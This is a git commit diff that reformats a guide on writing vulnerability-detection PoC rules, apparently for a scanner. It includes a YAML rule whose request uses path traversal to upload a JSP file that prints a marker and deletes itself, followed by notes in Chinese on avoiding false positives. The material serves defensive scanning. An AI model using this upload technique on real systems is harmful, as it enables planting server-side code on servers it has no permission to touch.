[fix] 修复格式问题

chaitin · Sep 22, 2023 · 27f5cf1 · 27f5cf1
1 parent 2d8de49
commit 27f5cf1
Showing 1 changed file with 8 additions and 7 deletions.
diff --git a/guide/hiq/about_vulns.md b/guide/hiq/about_vulns.md
@@ -358,12 +358,13 @@ rules:
 			cache: true
 			method: POST
 			path: /UploadFileData?action=upload_file&foldername=%2e%2e%2f&filename={{s2}}.jsp
-			body: >-
-				------WebKitFormBoundary{{rBoundary}}
-				Content-Disposition: form-data; name="myFile"; filename="test.jpg"
-				
-				<% out.println(\"{{s1}}\"); new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
-				------WebKitFormBoundary{{rBoundary}}--
+			body: "\
+				------WebKitFormBoundary{{rBoundary}}\r\n\
+				Content-Disposition: form-data; name=\"myFile\"; filename=\"test.jpg\"\r\n\
+				\r\n\
+				<% out.println(\"{{s1}}\"); new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n\
+				------WebKitFormBoundary{{rBoundary}}--\r\n\
+				"
 			headers:
 				Content-Type: multipart/form-data
 		expression: response.status == 200 && response.body.bcontains(b"showSucceedMsg")
@@ -602,4 +603,4 @@ detail:
 - response.body.bcontains(b"maintain_basic.asp") 以及 response.body.bcontains(b"user_expire_time=") 说明了当发生未授权访问时，页面中相对于授权时会多出的内容
 - 同时response.status == 200 尽可能地剔除了访问时产生404的页面，一定程度上节省开支
 
-综上，我们可以判断这些条件足以使得此poc尽可能地避免误报，最终达成的效果会很好
+综上，我们可以判断这些条件足以使得此poc尽可能地避免误报，最终达成的效果会很好